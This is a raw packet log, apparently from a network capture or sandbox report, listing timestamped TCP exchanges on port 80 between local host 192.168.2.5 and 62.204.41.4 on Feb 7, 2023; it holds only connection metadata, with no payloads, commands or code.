Feb 7, 2023 19:59:51.290673971 CET	80	50305	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.290798903 CET	50305	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.405894041 CET	50305	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.407313108 CET	50306	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.467255116 CET	80	50305	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.467343092 CET	50305	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.467756033 CET	80	50306	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.467861891 CET	50306	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.473442078 CET	50306	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.533960104 CET	80	50306	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.536433935 CET	80	50306	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.536534071 CET	50306	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.639579058 CET	50306	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.640300989 CET	50307	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.700064898 CET	80	50306	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.700176954 CET	50306	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.703430891 CET	80	50307	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.703587055 CET	50307	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.711604118 CET	50307	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.773247004 CET	80	50307	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.775624037 CET	80	50307	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.775727987 CET	50307	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.889647961 CET	50307	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.890321016 CET	50308	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.951097012 CET	80	50307	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.951788902 CET	80	50308	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:51.951895952 CET	50307	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.951909065 CET	50308	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:51.952267885 CET	50308	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.014311075 CET	80	50308	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.016221046 CET	80	50308	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.016311884 CET	50308	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.125327110 CET	50308	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.126137972 CET	50309	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.186880112 CET	80	50308	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.187836885 CET	80	50309	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.188045025 CET	50308	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.188072920 CET	50309	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.188472033 CET	50309	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.249985933 CET	80	50309	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.253403902 CET	80	50309	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.256653070 CET	50309	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.373543024 CET	50309	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.374195099 CET	50310	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.434338093 CET	80	50310	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.434618950 CET	50310	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.435167074 CET	80	50309	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.435303926 CET	50310	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.435359955 CET	50309	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.495589972 CET	80	50310	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.498862982 CET	80	50310	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.502206087 CET	50310	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.618618011 CET	50310	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.619348049 CET	50311	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.678805113 CET	80	50310	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.678874016 CET	80	50311	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.678936005 CET	50310	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.679039955 CET	50311	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.679367065 CET	50311	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.738996029 CET	80	50311	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.746522903 CET	80	50311	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.746675014 CET	50311	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.858668089 CET	50311	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.859455109 CET	50312	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.919594049 CET	80	50311	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.919871092 CET	50311	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.921103954 CET	80	50312	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.921303988 CET	50312	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.924012899 CET	50312	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:52.984606028 CET	80	50312	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.986862898 CET	80	50312	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:52.987015009 CET	50312	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.095813990 CET	50312	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.096483946 CET	50313	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.156455994 CET	80	50312	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.156584978 CET	50312	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.158704996 CET	80	50313	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.158958912 CET	50313	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.159400940 CET	50313	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.222239971 CET	80	50313	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.225836992 CET	80	50313	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.225992918 CET	50313	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.343125105 CET	50313	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.344109058 CET	50314	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.405563116 CET	80	50313	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.405649900 CET	80	50314	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.406025887 CET	50314	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.406090975 CET	50313	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.406802893 CET	50314	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.468518972 CET	80	50314	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.470809937 CET	80	50314	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.470885992 CET	50314	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.577641010 CET	50314	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.578447104 CET	50315	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.639282942 CET	80	50314	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.639442921 CET	50314	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.639591932 CET	80	50315	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.639756918 CET	50315	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.640304089 CET	50315	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.701435089 CET	80	50315	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.704029083 CET	80	50315	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.704178095 CET	50315	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.812884092 CET	50315	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.813553095 CET	50316	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.874631882 CET	80	50315	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.874736071 CET	50315	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.874895096 CET	80	50316	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.875003099 CET	50316	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.881598949 CET	50316	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:53.943418026 CET	80	50316	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.946224928 CET	80	50316	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:53.946556091 CET	50316	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.062417984 CET	50316	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.063677073 CET	50317	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.123846054 CET	80	50316	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.124017000 CET	50316	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.124921083 CET	80	50317	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.125051022 CET	50317	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.125433922 CET	50317	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.186774015 CET	80	50317	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.191246986 CET	80	50317	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.191451073 CET	50317	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.298479080 CET	50317	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.300101042 CET	50318	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.359958887 CET	80	50317	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.360069990 CET	50317	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.360573053 CET	80	50318	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.360718012 CET	50318	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.361124039 CET	50318	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.423177004 CET	80	50318	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.426115990 CET	80	50318	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.426243067 CET	50318	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.532917976 CET	50318	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.533915043 CET	50319	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.593352079 CET	80	50318	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.593470097 CET	50318	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.594420910 CET	80	50319	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.594572067 CET	50319	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.594852924 CET	50319	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.655390024 CET	80	50319	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.658057928 CET	80	50319	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.658116102 CET	50319	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.765217066 CET	50319	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.765906096 CET	50320	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.828172922 CET	80	50319	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.828275919 CET	50319	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.828438044 CET	80	50320	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.828526974 CET	50320	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.828974962 CET	50320	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.891146898 CET	80	50320	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.893963099 CET	80	50320	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:54.894085884 CET	50320	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.998996973 CET	50320	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:54.999862909 CET	50321	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.060410976 CET	80	50320	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.060508013 CET	50320	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.061041117 CET	80	50321	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.061155081 CET	50321	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.064377069 CET	50321	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.125703096 CET	80	50321	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.129900932 CET	80	50321	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.130039930 CET	50321	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.239646912 CET	50321	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.240503073 CET	50322	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.301259995 CET	80	50321	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.301414013 CET	50321	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.302234888 CET	80	50322	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.302366018 CET	50322	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.303212881 CET	50322	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.364707947 CET	80	50322	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.369685888 CET	80	50322	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.372754097 CET	50322	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.488478899 CET	50322	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.489212990 CET	50323	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.555869102 CET	80	50322	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.555902004 CET	80	50323	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.559133053 CET	50322	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.559165955 CET	50323	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.559778929 CET	50323	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.622201920 CET	80	50323	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.626883984 CET	80	50323	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.629514933 CET	50323	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.733639956 CET	50323	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.734250069 CET	50324	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.795016050 CET	80	50324	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.796154022 CET	80	50323	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.796358109 CET	50323	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.796736956 CET	50324	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.796736956 CET	50324	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.857172966 CET	80	50324	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.859814882 CET	80	50324	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:55.859992981 CET	50324	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.976943016 CET	50324	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:55.977861881 CET	50325	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.038425922 CET	80	50324	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.038564920 CET	50324	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.039494991 CET	80	50325	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.039628983 CET	50325	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.050544977 CET	50325	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.110960007 CET	80	50325	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.116780043 CET	80	50325	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.117007017 CET	50325	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.234313011 CET	50325	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.235222101 CET	50326	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.295545101 CET	80	50326	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.295816898 CET	80	50325	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.296019077 CET	50325	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.296799898 CET	50326	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.296799898 CET	50326	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.357628107 CET	80	50326	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.359690905 CET	80	50326	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.361944914 CET	50326	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.468569994 CET	50326	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.469466925 CET	50327	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.528054953 CET	80	50326	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.528214931 CET	50326	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.529934883 CET	80	50327	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.530145884 CET	50327	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.530972004 CET	50327	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.592622042 CET	80	50327	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.593581915 CET	80	50327	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.593662977 CET	50327	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.704751015 CET	50327	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.705524921 CET	50328	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.766406059 CET	80	50327	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.766570091 CET	50327	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.767698050 CET	80	50328	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.767817020 CET	50328	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.770342112 CET	50328	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.832586050 CET	80	50328	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.835864067 CET	80	50328	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:56.835973024 CET	50328	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.952951908 CET	50328	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:56.953825951 CET	50329	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.013355017 CET	80	50329	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.013541937 CET	50329	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.013885021 CET	50329	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.015383959 CET	80	50328	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.015515089 CET	50328	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.073031902 CET	80	50329	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.078119993 CET	80	50329	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.078193903 CET	50329	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.187258959 CET	50329	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.187918901 CET	50330	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.246870041 CET	80	50329	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.247087955 CET	50329	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.247143030 CET	80	50330	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.247235060 CET	50330	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.254967928 CET	50330	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.315651894 CET	80	50330	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.318006039 CET	80	50330	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.318113089 CET	50330	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.450668097 CET	50330	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.451478004 CET	50331	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.510001898 CET	80	50330	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.510076046 CET	50330	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.511773109 CET	80	50331	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.511874914 CET	50331	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.512461901 CET	50331	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.573690891 CET	80	50331	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.575320959 CET	80	50331	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.575400114 CET	50331	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.687289000 CET	50331	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.687974930 CET	50332	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.748570919 CET	80	50331	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.749361038 CET	80	50332	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.749790907 CET	50331	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.749826908 CET	50332	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.750216007 CET	50332	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.811784029 CET	80	50332	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.814187050 CET	80	50332	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.814259052 CET	50332	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.921065092 CET	50332	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.921797991 CET	50333	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.982795954 CET	80	50332	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.982952118 CET	50332	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.983212948 CET	80	50333	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:57.983335972 CET	50333	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:57.984721899 CET	50333	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.046045065 CET	80	50333	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.049992085 CET	80	50333	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.050097942 CET	50333	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.155996084 CET	50333	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.156732082 CET	50334	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.219692945 CET	80	50334	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.219870090 CET	50334	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.220634937 CET	80	50333	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.220725060 CET	50333	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.221791029 CET	50334	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.287595034 CET	80	50334	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.289617062 CET	80	50334	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.289745092 CET	50334	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.406161070 CET	50334	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.407151937 CET	50335	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.467010021 CET	80	50334	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.467211008 CET	50334	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.468746901 CET	80	50335	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.468971968 CET	50335	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.469496965 CET	50335	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.530977964 CET	80	50335	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.533184052 CET	80	50335	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.533333063 CET	50335	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.640810013 CET	50335	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.641736031 CET	50336	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.702090025 CET	80	50336	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.702672005 CET	80	50335	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.702770948 CET	50336	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.702801943 CET	50335	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.703262091 CET	50336	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.763575077 CET	80	50336	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.765752077 CET	80	50336	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.768811941 CET	50336	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.874972105 CET	50336	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.875644922 CET	50337	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.935383081 CET	80	50336	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.935590982 CET	50336	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.937170029 CET	80	50337	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:58.938332081 CET	50337	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:58.938843966 CET	50337	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.001051903 CET	80	50337	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.003376007 CET	80	50337	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.005728960 CET	50337	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.108805895 CET	50337	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.118216991 CET	50338	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.171106100 CET	80	50337	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.173147917 CET	50337	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.180984974 CET	80	50338	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.186669111 CET	50338	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.187277079 CET	50338	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.248061895 CET	80	50338	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.251653910 CET	80	50338	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.252418041 CET	50338	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.360328913 CET	50338	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.361861944 CET	50339	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.420936108 CET	80	50338	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.422807932 CET	80	50339	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.422995090 CET	50338	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.423070908 CET	50339	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.425941944 CET	50339	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.486804962 CET	80	50339	62.204.41.4	192.168.2.5
